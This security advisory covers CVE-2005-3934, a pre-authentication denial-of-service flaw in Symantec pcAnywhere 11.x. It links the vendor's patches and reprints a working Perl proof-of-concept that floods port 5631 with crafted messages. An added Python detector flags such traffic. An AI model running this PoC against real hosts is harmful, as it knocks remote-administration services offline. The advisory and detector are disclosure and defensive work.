BUGTRAQ ID: 15646
CVE(CAN) ID: CVE-2005-3934
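Symantec pcAnywhere is the world's best-selling remote control solution for managing servers and supporting administrators.
pcAnywhere contains an overflow vulnerability in its handling of specially crafted messages, which can lead to a denial of service. Because the overflow occurs before authentication, a remote attacker can exploit this vulnerability without valid credentials.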
Symantec pcAnywhere 11.5.1
Symantec pcAnywhere 11.0.1
The vendor has released an upgrade patch that fixes this security issue. Download it from the vendor's site:
<a href="http://www.symantec.com/techsupp/files/pca/index.html" target="_blank">http://www.symantec.com/techsupp/files/pca/index.html</a>
<a href="http://www.symantec.com/techsupp/enterprise/products/spca/files.html" target="_blank">http://www.symantec.com/techsupp/enterprise/products/spca/files.html</a>
#!/usr/bin/perl -w
# Version 2.0
#
# PoC for
# pcAnywhere Authentication Denial of Service Vulnerability
# Bugtraq ID: 15646
#
# Tested on pcanywhere v11.0 and v11.0.1
#
# Author: David Maciejak
# Date: 20060117
#
##############################
use IO::Socket;
if (@ARGV<1)
{
die "usage: $0 pcanywhere_ip [port]";
}
$host=$ARGV[0];
$port=$ARGV[1] || 5631;
$|=1;
$cl1="\x00\x00\x00\x00";
$cl2="\x6F\x06\xff";
$cl3="\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00";
$cl4="\x6f\x62\x01\x02\x00\x00\x00";
$sock = IO::Socket::INET->new( PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp'
);
die "Could not create socket: $! \n" unless $sock;
$sock->send($cl1);
$sock->recv($buff,32768);
$sock->send($cl2 x 50);
$sock->recv($buff,32768);
$sock->send($cl3 x 50);
$sock->recv($buff,32768);
$sock->send($cl4);
$sock->recv($buff,32768);
$str='\x06'.'\x04'.'\0xffffffc0'x300;
$sock->send($str x 50);
close $sock;
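
Added example, not part of the original advisory or the PoC author's code: a defensive heuristic that flags client-to-server payloads on TCP 5631 consisting of one short record repeated many times, as in the PoC's `$cl2 x 50` and `$cl3 x 50` sends. The function names, the repeat threshold and the unit-size bound are assumptions to tune against legitimate pcAnywhere traffic; the sample records are constructed from the bytes shown above.

```python
# Added example (not the advisory's or PoC author's code): flag payloads sent
# to the pcAnywhere data port that are one short record repeated many times.
PCANYWHERE_PORT = 5631  # port the PoC above defaults to
MIN_REPEATS = 20        # assumed threshold; the PoC repeats each record 50 times
MAX_UNIT = 64           # assumed upper bound on the repeated record length


def smallest_repeating_unit(payload, max_unit=MAX_UNIT):
    """Return (unit, count) if payload is a short unit repeated, else None."""
    n = len(payload)
    for size in range(1, min(max_unit, n // 2) + 1):
        if n % size == 0 and payload == payload[:size] * (n // size):
            return payload[:size], n // size
    return None


def is_suspicious(dst_port, payload, min_repeats=MIN_REPEATS):
    """True for a client payload to 5631 made of >= min_repeats copies."""
    if dst_port != PCANYWHERE_PORT:
        return False
    found = smallest_repeating_unit(payload)
    return found is not None and found[1] >= min_repeats


def scan(records):
    """records: iterable of (src_ip, dst_port, payload); return alert tuples."""
    alerts = []
    for src, port, payload in records:
        if is_suspicious(port, payload):
            unit, count = smallest_repeating_unit(payload)
            alerts.append((src, unit.hex(), count))
    return alerts


# Constructed sample input: documentation-range source IPs, payload bytes taken
# from the $cl1/$cl2/$cl3 values shown in the PoC above.
SAMPLES = [
    ("192.0.2.10", 5631, b"\x00\x00\x00\x00"),
    ("192.0.2.10", 5631, b"\x6f\x06\xff" * 50),
    ("192.0.2.10", 5631,
     b"\x6f\x61\x00\x09\x00\xfe\x00\x00\xff\xff\x00\x00\x00\x00" * 50),
    ("198.51.100.7", 5631, bytes(range(40))),    # non-repeating filler
    ("198.51.100.7", 80, b"\x6f\x06\xff" * 50),  # other port, ignored
]

if __name__ == "__main__":
    for alert in scan(SAMPLES):
        print("ALERT src=%s unit=%s repeats=%d" % alert)
```

Apply the check to reassembled stream data, since one send may span several TCP segments. The PoC's final send repeats a unit longer than `MAX_UNIT` and is not matched by this check.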